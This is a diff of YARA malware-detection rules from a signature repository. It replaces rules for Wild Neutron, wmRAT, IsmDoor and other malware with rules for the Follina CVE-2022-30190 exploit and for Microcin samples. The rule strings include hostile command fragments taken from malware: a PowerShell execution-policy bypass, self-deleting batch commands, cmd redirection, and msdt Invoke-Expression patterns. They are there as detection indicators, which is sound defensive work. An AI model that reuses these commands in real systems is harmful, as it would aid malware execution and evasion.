+		$sc5 = "QwQ0YxMUUwQTFCMTFBRT" ascii
+		$sc6 = "EMENGMTFFMEExQjExQUUx" ascii
+		$x1 = "NjgwMDc0MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
+		$x2 = "Y4MDA3NDAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
+		$x3 = "2ODAwNzQwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
+		$x4 = "NjgwMDc0MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
+		$x5 = "Y4MDA3NDAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
+		$x6 = "2ODAwNzQwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
+		$x7 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzYTAwMmYwMDJmMD" ascii
+		$x8 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM2EwMDJmMDAyZjAw" ascii
+		$x9 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNhMDAyZjAwMmYwM" ascii
+		$x10 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzQTAwMkYwMDJGMD" ascii
+		$x11 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM0EwMDJGMDAyRjAw" ascii
+		$x12 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNBMDAyRjAwMkYwM" ascii
+		$x13 = "NjYwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
+		$x14 = "Y2MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
+		$x15 = "2NjAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
+		$x16 = "NjYwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
+		$x17 = "Y2MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
+		$x18 = "2NjAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1477KB and all of them
+		filesize < 10MB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_10 : FILE
+rule SIGNATURE_BASE_SUSP_DOC_RTF_Externalresource_EMAIL_Jun22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5654a36f-8502-5e18-b8f3-94d4add466a7"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L225-L267"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation inside e-mail attachment"
+		author = "Christian Burkard"
+		id = "3ddc838c-8520-5572-9652-8cb823f83e27"
+		date = "2022-06-01"
+		modified = "2025-03-21"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L194-L220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
-		logic_hash = "b282b6892f9cb6769bf0e302deaa8062fd69bfd51144bc06fc9501fde9537dae"
-		score = 60
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "73e76bd80f77640c0d8d47ebb7903eb9cc23336fbe653e7d008cae6a0de7c45b"
+		score = 70
+		quality = 85
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii
-		$s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii
-		$s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii
-		$s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii
-		$s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii
-		$s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii
-		$s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii
-		$s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii
-		$s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii
-		$s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii
-		$s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii
-		$s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii
-		$x1 = "wdigestEx.dll" fullword ascii
-		$x2 = "dpcore16t.dll" fullword ascii
-		$x3 = "mspool.dll" fullword ascii
-		$x4 = "msvcse.exe" fullword ascii
-		$x5 = "mshtaex.exe" fullword wide
-		$x6 = "iastor32.exe" fullword ascii
-		$y1 = "Installer.exe" fullword ascii
-		$y2 = "Info: Process %s" fullword ascii
-		$y3 = "Error: GetFileTime %s 0x%x" fullword ascii
-		$y4 = "Install succeeded" fullword ascii
-		$y5 = "Error: RegSetValueExA 0x%x" fullword ascii
+		$sa1 = "PFJlbGF0aW9uc2hpcH" ascii
+		$sa2 = "xSZWxhdGlvbnNoaXBz" ascii
+		$sa3 = "8UmVsYXRpb25zaGlwc" ascii
+		$sb1 = "VGFyZ2V0TW9kZT0iRXh0ZXJuYWwi" ascii
+		$sb2 = "RhcmdldE1vZGU9IkV4dGVybmFsI" ascii
+		$sb3 = "UYXJnZXRNb2RlPSJFeHRlcm5hbC" ascii
+		$sc1 = "Lmh0bWwhI" ascii
+		$sc2 = "5odG1sIS" ascii
+		$sc3 = "uaHRtbCEi" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ( $s* ) and 1 of ( $x* ) and 3 of ( $y* ) ) )
+		filesize < 400KB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
 }
-rule SIGNATURE_BASE_APT_MAL_Wildneutron_Javacpl : FILE
+rule SIGNATURE_BASE_SUSP_Msdt_Artefact_Jun22_2 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "de82827e-61d4-559e-886a-78d5293ab141"
-		date = "2015-07-10"
-		modified = "2023-01-06"
-		old_rule_name = "WildNeutron_javacpl"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L272-L300"
+		description = "Detects suspicious pattern in msdt diagnostics log (e.g. CVE-2022-30190 / Follina exploitation)"
+		author = "Christian Burkard"
+		id = "aa2a4bd7-2094-5652-a088-f58d0c7d3f62"
+		date = "2022-06-01"
+		modified = "2022-07-29"
+		reference = "https://twitter.com/nas_bench/status/1531718490494844928"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L222-L241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c9cb6ab956d29df9f59520262ab308a0256747cc3c898979347304950e093098"
-		score = 60
+		logic_hash = "e18f6405f0411128335336e65dda4ed2b6be6e9ad47b94646ececf0479fbe967"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
-		hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
-		hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s1 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
-		$s2 = "cmdcmdline" wide fullword
-		$s3 = "\"%s\" /K %s" wide fullword
-		$s4 = "Process is not running any more" wide fullword
-		$s5 = "dpnxfsatz" wide fullword
-		$op1 = { ff d6 50 ff 15 ?? ?? 43 00 8b f8 85 ff 74 34 83 64 24 0c 00 e8 ?? ?? 02 00 }
-		$op2 = { b8 02 00 00 00 01 45 80 01 45 88 6a 00 47 52 89 7d 8c 03 d8 }
-		$op3 = { 8b c7 f7 f6 46 89 b5 c8 fd ff ff 0f b7 c0 8b c8 0f af ce 3b cf }
+		$a1 = "<ScriptError><Data id=\"ScriptName\" name=\"Script\">TS_ProgramCompatibilityWizard.ps1" ascii
+		$x1 = "/../../" ascii
+		$x2 = "$(Invoke-Expression" ascii
+		$x3 = "$(IEX(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and ( all of ( $s* ) or all of ( $op* ) )
+		uint32( 0 ) == 0x6D783F3C and $a1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_APT_IN_TA397_Wmrat : HUNTING
+rule SIGNATURE_BASE_SUSP_LNK_Follina_Jun22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "track wmRAT based on socket usage, odd error handling, and reused strings"
-		author = "Proofpoint"
-		id = "c5855b30-3e75-570f-b327-498dfc382159"
-		date = "2024-11-20"
-		modified = "2025-01-17"
-		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta397_dec24.yar#L2-L80"
+		description = "Detects LNK files with suspicious Follina/CVE-2022-30190 strings"
+		author = "Paul Hager"
+		id = "d331d584-2ab3-5275-b435-6129c7291417"
+		date = "2022-06-02"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/gossithedog/status/1531650897905950727"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L243-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3bf4bbd5564f4381820fb8da5810bd4d9718b5c80a7e8f055961007c6f30da2b"
-		hash = "3e9a08972b8ec9c2e64eeb46ce1db92ae3c40bc8de48d278ba4d436fc3c8b3a4"
-		hash = "40ddb4463be9d8131f363fd78e21d9de5d838a3ec4044526aea45a473d6ddd61"
-		hash = "4836cb7eed0b20da50acb26472f918b180917101c026ce36074e0e879b604308"
-		hash = "4e3e4d476810c95c34b6f2aa9c735f8e57e85e3b7a97c709adc5d6ee4a5f6ccc"
-		hash = "5ab76cf85ade810b7ae449e3dff8a19a018174ced45d37062c86568d9b7633f9"
-		hash = "811741d9df51a9f16272a64ec7eb8ff12f8f26794368b1ff4ad5d30a1f4bb42a"
-		hash = "b588a423b826b57dce72c9ab58f89be2ddc710a0367ed0eed001c047d8bef32a"
-		hash = "caf871247b7256945598816e9c5461d64b6bdb68a15ff9f8742ca31dc00865f8"
-		logic_hash = "b20a13b87f4b81e7ebc10ff2f6203aeab46980e0d481bad786695339dd59bf7a"
+		logic_hash = "0b63bb266b968987b2b5a83c9429e96acbd57e12178e4f5fd5894b23d1aaa237"
 		score = 75
 		quality = 85
-		tags = "HUNTING"
-		category = "hunting"
-		malfamily = "wmRAT"
-		version = "1.0"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$code_sleep_loop = {
-            6a 64              // push    0x64
-            ff d6              // call    esi
-            6a 01              // push    0x1
-            e8 ?? ?? ?? ??     // call    operator new
-            83 c4 04           // add     esp, 0x4
-            3b c7              // cmp     eax, edi
-
-        }
-		$code_error_handling = {
-            88 19           // mov     byte [ecx], bl
-            4a              // dec     edx
-            41              // inc     ecx
-            47              // inc     edi
-            4e              // dec     esi
-            85 d2           // test    edx, edx
-            ?? ??           // jne     0x401070
-            5f              // pop     edi {__saved_edi}
-            49              // dec     ecx
-            5e              // pop     esi {__saved_esi}
-            b8 7a 00 07 80  // mov     eax, 0x8007007a
-
-        }
-		$code_socket_recv_parsing = {
-            // 8b 15 20 55 41 00   mov     edx, dword [data_415520]
-            6a 00              // push    0x0
-            b8 04 00 00 00     // mov     eax, 0x4
-            2b c6              // sub     eax, esi
-            50                 // push    eax {var_10_1}
-            8d 0c 3e           // lea     ecx, [esi+edi]
-            51                 // push    ecx {var_14_1}
-            52                 // push    edx {var_18_1}
-            ff ??              // call    ebx
-            83 f8 ff           // cmp     eax, 0xffffffff
-            ?? ??              // je      0x4082e3
-            03 f0              // add     esi, eax
-            83 fe 04           // cmp     esi, 0x4
-          }
-		$str1 = "-.-.-." ascii
-		$str2 = "PATH" ascii
-		$str3 = "Path=" ascii
-		$str4 = "https://microsoft.com" ascii
-		$str5 = "%s%ld M" ascii
-		$str6 = "%s%ld K" ascii
-		$str7 = "%s(%ld)" ascii
-		$str8 = "RFOX" ascii
-		$str9 = "1llll" ascii
-		$str10 = "%d result(s)" ascii
-		$str11 = "%s%ld MB" ascii
-		$str12 = "%s%ld KB" ascii
-		$str13 = "%.1f" ascii
-		$str14 = "%02d-%02d-%d %02d:%02d" ascii
+		$sa1 = "msdt.exe" ascii wide
+		$sa2 = "msdt " ascii wide
+		$sa3 = "ms-msdt:" ascii wide
+		$sb = "IT_BrowseForFile=" ascii wide
 
 	condition:
-		uint16be( 0x0 ) == 0x4d5a and ( 2 of ( $code* ) or 10 of ( $str* ) )
+		filesize < 5KB and uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and 1 of ( $sa* ) and $sb
 }
-rule SIGNATURE_BASE_SUSP_RAR_NTFS_ADS : HUNTING FILE
+rule SIGNATURE_BASE_Fidelis_Advisory_Purchase_Order_Pps
 {
 	meta:
-		description = "Detects RAR archive with NTFS alternate data stream"
-		author = "Proofpoint"
-		id = "ca2b5904-b3d3-53cd-a973-6f30f0831a94"
-		date = "2024-12-17"
-		modified = "2025-01-17"
-		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta397_dec24.yar#L82-L110"
+		description = "Detects a string found in a malicious document named Purchase_Order.pps"
+		author = "Florian Roth (Nextron Systems)"
+		id = "205c4cda-6874-5455-8eb9-b63fb09b13fd"
+		date = "2015-06-09"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/ZjJyti"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fidelis_phishing_plain_sight.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bcca4771e8f940ce8cfcff08284545fec6163df549e1fb589d89ca3fa335f04c"
-		score = 70
-		quality = 83
-		tags = "HUNTING, FILE"
-		category = "hunting"
-		hash1 = "feec47858379c29300d249d1693f68dc085300f493891d1a9d4ea83b8db6e3c3"
-		hash2 = "53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1"
+		logic_hash = "45cfee6413accff36a39ced861a29c611d6efe24e1ca87f17467106f8565642b"
+		score = 75
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$rar_magic = {52 61 72 21}
-		$ads = {
-                 03         // Header Type -> Service Header
-                 23         // Header flags
-                 [17-20]    // Flags and extra data area
-                 00         // Windows
-                 03         // Length of name = STM = 3
-                 53 54 4d   // STM NTFS alternate data stream
-                 [1-2]      // variable int (vint) for size of the stream name -> 1-2 bytes should be enough to take into account
-                 07         // Data type = Service data = Service header data array
-                 3a         // Start of the ADS name -> start with colon ":"
-               }
-		$neg = "Zone.Identifier"
+		$s0 = "Users\\Gozie\\Desktop\\Purchase-Order.gif" ascii
 
 	condition:
-		$rar_magic at 0 and $ads and not $neg in ( @ads [ 1 ] .. @ads [ 1 ] + 15 )
+		all of them
 }
-rule SIGNATURE_BASE_Trojandownloader : FILE
+rule SIGNATURE_BASE_Fidelis_Advisory_Cedt370
 {
 	meta:
-		description = "Trojan Downloader - Flash Exploit Feb15"
+		description = "Detects a string found in memory of malware cedt370r(3).exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d61f59ef-31a3-5e52-9525-61910bb150db"
-		date = "2015-02-11"
+		id = "b5ebf2d7-e3e4-5b3b-a082-417da9c7fda6"
+		date = "2015-06-09"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/wJ8V1I"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L4-L41"
+		reference = "http://goo.gl/ZjJyti"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fidelis_phishing_plain_sight.yar#L16-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
-		logic_hash = "4911098beea1d348d41d6a38c03b343bb7b8a8090ba664fd4b0747045127c686"
-		score = 60
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "1070d3c63a7091c0982e67134f9dc3cd790bb0b5c2ac08f3a00e3b97ef53d64b"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$x1 = "Hello World!" fullword ascii
-		$x2 = "CONIN$" fullword ascii
-		$s6 = "GetCommandLineA" fullword ascii
-		$s7 = "ExitProcess" fullword ascii
-		$s8 = "CreateFileA" fullword ascii
-		$s5 = "SetConsoleMode" fullword ascii
-		$s9 = "TerminateProcess" fullword ascii
-		$s10 = "GetCurrentProcess" fullword ascii
-		$s11 = "UnhandledExceptionFilter" fullword ascii
-		$s3 = "user32.dll" fullword ascii
-		$s16 = "GetEnvironmentStrings" fullword ascii
-		$s2 = "GetLastActivePopup" fullword ascii
-		$s17 = "GetFileType" fullword ascii
-		$s19 = "HeapCreate" fullword ascii
-		$s20 = "VirtualFree" fullword ascii
-		$s21 = "WriteFile" fullword ascii
-		$s22 = "GetOEMCP" fullword ascii
-		$s23 = "VirtualAlloc" fullword ascii
-		$s24 = "GetProcAddress" fullword ascii
-		$s26 = "FlushFileBuffers" fullword ascii
-		$s27 = "SetStdHandle" fullword ascii
-		$s28 = "KERNEL32.dll" fullword ascii
+		$s0 = "PO.exe" ascii fullword
+		$s1 = "Important.exe" ascii fullword
+		$s2 = "&username=" ascii fullword
+		$s3 = "Browsers.txt" ascii fullword
 
 	condition:
-		$x1 and $x2 and ( all of ( $s* ) ) and filesize < 35000
+		all of them
 }
-rule SIGNATURE_BASE_Ismdoor_Jul17_A2 : FILE
+
+rule SIGNATURE_BASE_Microcin_Sample_1 : FILE
 {
 	meta:
-		description = "Detects IsmDoor Malware"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea72a496-cbc8-56f6-a852-7af9761ea58e"
-		date = "2017-08-01"
+		id = "96e9ac3b-a837-5909-b17b-259d54e0e7fd"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/Voulnet/status/892104753295110145"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L54-L71"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L13-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7944f690be190927c905d3b3c6e26765504af9fcfb445cf70c8899af115d5001"
+		logic_hash = "e7eb967035257490db2537ba46fd1f1e378fc33f93e7f65412949e987194a9db"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be72c89efef5e59c4f815d2fce0da5a6fac8c90b86ee0e424868d4ae5e550a59"
-		hash2 = "ea1be14eb474c9f70e498c764aaafc8b34173c80cac9a8b89156e9390bd87ba8"
+		hash1 = "49816eefcd341d7a9c1715e1f89143862d4775ba4f9730397a1e8529f5f5e200"
+		hash2 = "a73f8f76a30ad5ab03dd503cc63de3a150e6ab75440c1060d75addceb4270f46"
+		hash3 = "9dd9bb13c2698159eb78a0ecb4e8692fd96ca4ecb50eef194fa7479cb65efb7c"
 
 	strings:
-		$s1 = "powershell -exec bypass -file \"" fullword ascii
-		$s2 = "PAQlFcaWUaFkVICEx2CkNCUUpGcA" ascii
-		$s3 = "\\Documents" ascii
-		$s4 = "\\Libraries" ascii
+		$s1 = "e Class Descriptor at (" ascii
+		$s2 = ".?AVCAntiAntiAppleFrameRealClass@@" fullword ascii
+		$s3 = ".?AVCAntiAntiAppleFrameBaseClass@@" fullword ascii
+		$s4 = ".?AVCAppleBinRealClass@@" fullword ascii
+		$s5 = ".?AVCAppleBinBaseClass@@" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 4 of them or pe.imphash ( ) == "897077ca318eaf629cfe74569f10e023" ) )
 }
-rule SIGNATURE_BASE_Unknown_Malware_Sample_Jul17_2 : FILE
+rule SIGNATURE_BASE_Microcin_Sample_2 : FILE
 {
 	meta:
-		description = "Detects unknown malware sample with pastebin RAW URL"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ce82b9eb-a9cb-5122-85dc-22794174c2f8"
-		date = "2017-08-01"
+		id = "8718ef84-be2b-55a6-a4bb-41161548a2b4"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/iqH8CK"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L73-L89"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L38-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "966e14331fa89f2cdb5593a0c10227264085ee127deed28341e395ba6845e19d"
+		logic_hash = "99feb3e1672f69c4cf41a100e9ba64421fd75c3554306a1bf1475da6f1e14ed1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52"
+		hash1 = "8a7d04229722539f2480270851184d75b26c375a77b468d8cbad6dbdb0c99271"
 
 	strings:
-		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
-		$s2 = "https://pastebin.com/raw/" wide
-		$s3 = "My.Computer" fullword ascii
-		$s4 = "MyTemplate" fullword ascii
+		$s2 = "[Pause]" fullword ascii
+		$s7 = "IconCache_%02d%02d%02d%02d%02d" fullword ascii
 
 	condition:
 		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Unspecified_Jan18_1 : FILE
+rule SIGNATURE_BASE_Microcin_Sample_3 : FILE
 {
 	meta:
-		description = "Detects unspecified malware sample"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f3187c60-8fff-54de-9918-2fb2301f2d92"
-		date = "2018-01-19"
+		id = "daecdfe3-e78c-55ee-83a3-3cee8cb9bb5f"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L91-L110"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L54-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd4f7247473e04c348b49970ee3a6fd01415f005ac6dc7a79fbf937a693a80f4"
+		logic_hash = "bf1227460f1fc4a7bede853b0d4f15b520db870ac7ce2e6684dc195ea6322e82"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417"
+		hash1 = "4f74a3b67c5ed6f38f08786f1601214412249fe128f12c51525135710d681e1d"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s2 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" fullword ascii
-		$s3 = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
-		$s4 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" fullword ascii
-		$s5 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
-		$s6 = "%s\\%s.bat" fullword ascii
-		$s7 = "DEL /s \"%s\" >nul 2>&1" fullword ascii
+		$x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii
+		$s2 = "test, Version 1.0" fullword wide
 
 	condition:
-		filesize < 300KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Emissary_APT_Malware_1 : FILE
+rule SIGNATURE_BASE_Microcin_Sample_4 : FILE
 {
 	meta:
-		description = "Detects Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae6ff471-9255-52a3-89d2-452eb2556184"
-		date = "2016-01-02"
+		id = "8a6a0735-422a-5e91-9274-ce55f7bee5d3"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/V0epcf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_emissary.yar#L8-L43"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L70-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cab20ac0c17dcc5cb9d0c9f4cffe47e5880acd9dee935cb0eb1ef59579a23f17"
+		logic_hash = "1293fbd1a6b440168bb1d7b250df0c8a1a7f99a7fb603a6abec7fe7ba20cf4f5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
-		hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
-		hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
-		hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
-		hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
-		hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
-		hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
-		hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
-		hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
-		hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
-		hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
-		hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
-		hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
+		hash1 = "92c01d5af922bdaacb6b0b2dfbe29e5cc58c45cbee5133932a499561dab616b8"
 
 	strings:
-		$s1 = "cmd.exe /c %s > %s" fullword ascii
-		$s2 = "execute cmd timeout." fullword ascii
-		$s3 = "rundll32.exe \"%s\",Setting" fullword ascii
-		$s4 = "DownloadFile - exception:%s." fullword ascii
